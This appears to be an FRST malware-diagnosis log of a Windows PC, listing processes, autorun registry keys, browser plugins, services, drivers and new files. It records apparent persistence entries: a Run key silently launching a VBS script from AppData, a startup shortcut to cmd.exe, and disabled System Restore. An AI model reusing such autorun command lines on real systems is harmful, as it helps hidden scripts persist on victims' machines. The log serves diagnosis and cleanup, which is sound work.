(IBM Corp) C:\Program Files (x86)\IBM\Lotus\Notes\nslsvice.exe
(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReader\10.00\Licensing\CE\NetworkLicenseServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(DameWare Development LLC) C:\Windows\SysWOW64\DNTUS26.EXE
(ESET) C:\Program Files\ESET\ESET Endpoint Antivirus\x86\ekrn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(IBM Corp) C:\Program Files (x86)\IBM\Lotus\Notes\ntmulti.exe
(Softwaremanagement.org) C:\Windows\SysWOW64\SMOmonitorSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\CCM\CcmExec.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkUserAgent.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Cordaware) C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\ssonsvr.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(ESET) C:\Program Files\ESET\ESET Endpoint Antivirus\egui.exe
(Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.EXE
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Nenad Hrg SoftwareOK) C:\Program Files\SoftwareOK\DesktopOK\DesktopOK_x64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\pnamain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPConnectionManager.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM.…\Run: [IME14 JPN Setup] => C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEKLMG.EXE [110776 2015-10-13] (Microsoft Corporation)
HKLM.…\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2804976 2013-10-25] (Synaptics Incorporated)
HKLM.…\Run: [egui] => C:\Program Files\ESET\ESET Endpoint Antivirus\egui.exe [4133072 2012-07-04] (ESET)
HKLM.…\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.exe [8628224 2014-11-24] (Broadcom Corporation)
HKLM.…\Run: [b] => wscript.exe //B “C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs”
HKLM-x32.…\Run: [IME14 JPN Setup] => C:\Program Files (x86)\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE [81080 2015-10-13] (Microsoft Corporation)
HKLM-x32.…\Run: [IBM Lotus Notes Preloader] => C:\Program Files (x86)\IBM\Lotus\Notes\nntspreld.exe [25480 2011-09-16] (IBM Corp)
HKLM-x32.…\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [304568 2010-10-12] (Citrix Systems, Inc.)
HKLM-x32.…\Run: [QLBController] => C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe [337184 2013-10-16] (Hewlett-Packard Company)
HKLM-x32.…\Run: =>
HKLM-x32.…\Run: [Infoclient] =>
HKLM-x32.…\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2015-09-27] (Adobe Systems Incorporated)
HKLM-x32.…\Run: [SunJavaUpdateSched] => “C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe”
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM.…\Policies\Explorer: [UseDefaultTile] 1
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION
HKU\S-1-5-19.…\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-20.…\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3459921781-3051252704-3355898513-500.…\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3459921781-3051252704-3355898513-500.…\Run: [DesktopOK] => C:\Program Files\SoftwareOK\DesktopOK\DesktopOK_x64.exe [349184 2012-01-01] (Nenad Hrg SoftwareOK)
HKU\S-1-5-21-3459921781-3051252704-3355898513-500.…\Run: [b] => wscript.exe //B “C:\Users\ADMINI~1\AppData\Roaming\winsc32\b.vbs”
Lsa: [Notification Packages] scecli c:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update Explorer.lnk [2016-08-21]
ShortcutTarget: Update Explorer.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2014-11-24]
ShortcutTarget: Bluetooth.lnk → C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Online Plug-in.lnk [2012-02-29]
ShortcutTarget: Online Plug-in.lnk → C:\Windows\Installer{0F1F7A90-E71B-4E45-A066-2891619F22E1}\pnaico.exe.20FBBF0A_A7E5_4BDE_9798_9811C3D135AC.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 10.5.53.1 41.79.20.1
Tcpip..\Interfaces{601C6FF9-75BD-4CF8-8DF3-D9B9325A6678}: [DhcpNameServer] 10.5.53.1 41.79.20.1

10

FRST cont.

Internet Explorer:

BHO: Java™ Plug-In SSV Helper → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → C:\Program Files\Java\jre1.8.0_77\bin\ssv.dll [2016-05-23] (Oracle Corporation)
BHO: Office Document Cache Handler → {B4F3A835-0E21-4959-BA22-42B3008E02FF} → C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-05-23] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper → {72853161-30C5-4D22-B7F9-0BBC1D38A37E} → C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: No Name → {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} → No File
BHO-x32: Adobe PDF Conversion Toolbar Helper → {AE7CD045-E861-484f-8273-0445EE161910} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler → {B4F3A835-0E21-4959-BA22-42B3008E02FF} → C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper → {DBC80044-A445-435b-BC74-9C25C1C588A9} → C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: SmartSelect Class → {F4971EE7-DAA0-4053-9964-665D8EE6A077} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2010-10-25] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-3459921781-3051252704-3355898513-500 → No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Handler-x32: saphtmlp - {D1F8BD1E-7967-11D2-B43A-006094B9EADB} - c:\program files (x86)\sap\frontend\sapgui\saphtmlp.dll [2015-07-27] (SAP, Walldorf)
Handler-x32: sapr3 - {D1F8BD1E-7967-11D2-B43A-006094B9EADB} - c:\program files (x86)\sap\frontend\sapgui\saphtmlp.dll [2015-07-27] (SAP, Walldorf)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2010-10-12] (Citrix Systems, Inc.)

FireFox:

FF Plugin: @java.com/DTPlugin,version=11.77.2 → C:\Program Files\Java\jre1.8.0_77\bin\dtplugin\npDeployJava1.dll [2016-05-23] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.77.2 → C:\Program Files\Java\jre1.8.0_77\bin\plugin2\npjp2.dll [2016-05-23] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 → C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer → C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw.dll [2015-04-17] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_43 → C:\WINDOWS\SysWOW64\npdeployJava1.dll [2014-06-26] (Sun Microsystems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 → C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 → C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 → C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 → C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 → C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 → C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader → C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-27] (Adobe Systems Inc.)
FF HKLM.…\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Endpoint Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET Endpoint Antivirus\Mozilla Thunderbird [2014-11-24] [not signed]
FF HKLM-x32.…\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2014-12-09] [not signed]

Chrome:

CHR Profile: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-21]
CHR Extension: (Google Search) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-02]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-21]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ABBYY.Licensing.FineReader.Corporate.10.0; C:\Program Files (x86)\Common Files\ABBYY\FineReader\10.00\Licensing\CE\NetworkLicenseServer.exe [814344 2010-05-07] (ABBYY)
R2 DisplayLinkService; C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe [9182096 2013-07-09] (DisplayLink Corp.)
R2 DNTUS26; C:\Windows\SysWOW64\DNTUS26.EXE [120184 2011-05-13] (DameWare Development LLC)
S3 EhttpSrv; C:\Program Files\ESET\ESET Endpoint Antivirus\EHttpSrv.exe [35720 2012-07-04] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET Endpoint Antivirus\x86\ekrn.exe [999704 2012-07-04] (ESET)
S3 ESHASRV; C:\Program Files\ESET\ESET Endpoint Antivirus\EShaSrv.exe [190208 2012-07-04] (ESET)
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe [681760 2013-10-16] (Hewlett-Packard Company)
R2 ImeDictUpdateService; C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICTUPDATE.EXE [83312 2010-10-20] (Microsoft Corporation)
R2 InfoclientUserDesktop; C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe [1765888 2010-04-20] (Cordaware) [File not signed]
R2 InfoclientWinlogonDesktop; C:\Program Files (x86)\Cordaware\Infoband\Infoclient.exe [1765888 2010-04-20] (Cordaware) [File not signed]
S4 LNSUSvc; C:\Program Files (x86)\IBM\Lotus\Notes\SUService.exe [189832 2011-09-16] (IBM Corp)
S4 Lotus Notes Diagnostics; C:\Program Files (x86)\IBM\Lotus\Notes\nsd.exe [4453768 2011-09-16] (IBM)
R2 Lotus Notes Single Logon; C:\Program Files (x86)\IBM\Lotus\Notes\nslsvice.exe [62856 2011-09-16] (IBM Corp)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 SMOmonitorSrv; C:\WINDOWS\SysWOW64\SMOmonitorSrv.exe [115152 2012-06-18] (Softwaremanagement.org)
S3 smstsmgr; C:\WINDOWS\SysWOW64\CCM\TSManager.exe [246624 2009-09-18] (Microsoft Corporation)
S4 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
S4 SNMP; C:\WINDOWS\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-06-24] (Microsoft Corporation)
R2 wltrysvc; C:\Program Files\Broadcom\Broadcom 802.11\bcmwltry.exe [5878272 2014-11-24] (Broadcom Corporation) [File not signed]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [172760 2013-10-02] (Broadcom Corporation.)
R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [494864 2013-08-30] (Intel Corporation)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [213416 2012-07-04] (ESET)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [179920 2012-07-04] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [152136 2012-03-29] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [140752 2012-03-29] (ESET)
S3 ew_usbenumfilter; C:\Windows\system32\drivers\ew_usbenumfilter.sys [14976 2014-02-07] (MBB Technologies Co., Ltd.)
S3 FUJ02B1; C:\Windows\system32\drivers\FUJ02B1.sys [7808 2010-12-08] (FUJITSU LIMITED)
S3 FUJ02E3; C:\Windows\system32\drivers\FUJ02E3.sys [7296 2010-12-08] (FUJITSU LIMITED)
S3 hwdatacard; C:\Windows\system32\drivers\ewusbmdm.sys [226048 2014-02-07] (MBB Technologies Co., Ltd.)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-01-24] (Intel Corporation)
S3 iaStorS; C:\Windows\system32\drivers\iaStorS.sys [639408 2012-03-31] (Intel Corporation)
R0 ioatdma; C:\Windows\System32\Drivers\ioatdma.sys [46792 2009-11-16] (Intel Corporation)
S3 ioatdma1; C:\Windows\System32\Drivers\qd160x64.sys [40144 2009-11-16] (Intel Corporation)
S3 ioatdma2; C:\Windows\System32\Drivers\qd260x64.sys [41168 2009-11-16] (Intel Corporation)
R3 ISCT; C:\Windows\System32\DRIVERS\ISCTD64.sys [46568 2013-08-13] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-08-21] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
S3 megasas2; C:\Windows\system32\drivers\megasas2.sys [51496 2012-01-17] (LSI Corporation)
S3 megasr1; C:\Windows\system32\drivers\megasr1.sys [809768 2012-03-29] (LSI Corporation, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
S3 O2MDRDR; C:\Windows\system32\drivers\o2mdx64.sys [58400 2010-12-17] (O2Micro )
R3 prepdrvr; C:\WINDOWS\SysWOW64\CCM\prepdrv.sys [26992 2009-09-18] (Microsoft Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [28416 2008-04-16] (Research In Motion Limited)
S3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [465624 2014-01-03] (Realsil Semiconductor Corporation)
R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [8876248 2013-11-14] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2013-10-25] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-25] (Synaptics Incorporated)
S3 swivsp; C:\Windows\system32\drivers\swivspnt.sys [23552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX00; C:\Windows\system32\drivers\swumx00.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 swumx12; C:\Windows\system32\drivers\swumx12.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX20; C:\Windows\system32\drivers\swumx20.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX21; C:\Windows\system32\drivers\swumx21.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX22; C:\Windows\system32\drivers\swumx22.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX32; C:\Windows\system32\drivers\swumx32.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX33; C:\Windows\system32\drivers\swumx33.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3A; C:\Windows\system32\drivers\swumx3a.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3B; C:\Windows\system32\drivers\swumx3B.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3C; C:\Windows\system32\drivers\swumx3C.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3D; C:\Windows\system32\drivers\swumx3D.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX3E; C:\Windows\system32\drivers\swumx3e.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX40; C:\Windows\system32\drivers\swumx40.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX50; C:\Windows\system32\drivers\swumx50.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX51; C:\Windows\system32\drivers\swumx51.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX52; C:\Windows\system32\drivers\swumx52.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX53; C:\Windows\system32\drivers\swumx53.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX54; C:\Windows\system32\drivers\swumx54.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX55; C:\Windows\system32\drivers\swumx55.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX56; C:\Windows\system32\drivers\swumx56.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX57; C:\Windows\system32\drivers\swumx57.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX58; C:\Windows\system32\drivers\swumx58.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX59; C:\Windows\system32\drivers\swumx59.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX5A; C:\Windows\system32\drivers\swumx5A.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX70; C:\Windows\system32\drivers\swumx70.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX71; C:\Windows\system32\drivers\swumx71.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX80; C:\Windows\system32\drivers\swumx80.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX81; C:\Windows\system32\drivers\swumx81.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX82; C:\Windows\system32\drivers\swumx82.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX90; C:\Windows\system32\drivers\swumx90.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX91; C:\Windows\system32\drivers\swumx91.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX92; C:\Windows\system32\drivers\swumx92.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMX93; C:\Windows\system32\drivers\swumx93.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 SWUMXA3; C:\Windows\system32\drivers\swumxa3.sys [199552 2011-03-07] (Sierra Wireless Inc.)
S3 vna_ap; C:\Windows\System32\DRIVERS\vnaap.sys [161256 2009-02-15] (Check Point Software Technologies)
S3 e1express; system32\DRIVERS\e1e6232e.sys
S3 e1yexpress; system32\DRIVERS\e1y62x64.sys
S3 VGPU; System32\drivers\rdvgkmd.sys

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

11

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-21 10:24 - 2016-08-21 10:25 - 00026428 _____ C:\Users\Administrator\Downloads\FRST.txt
2016-08-21 10:22 - 2016-08-21 10:24 - 00000000 ____D C:\FRST
2016-08-21 10:05 - 2016-08-21 10:05 - 00000000 ____D C:\Users\Administrator\AppData\Local\ESET
2016-08-21 09:54 - 2016-08-21 09:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-08-21 09:53 - 2016-08-21 09:53 - 00001068 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-08-21 09:53 - 2016-08-21 09:53 - 00000000 ____D C:\ProgramData\Malwarebytes
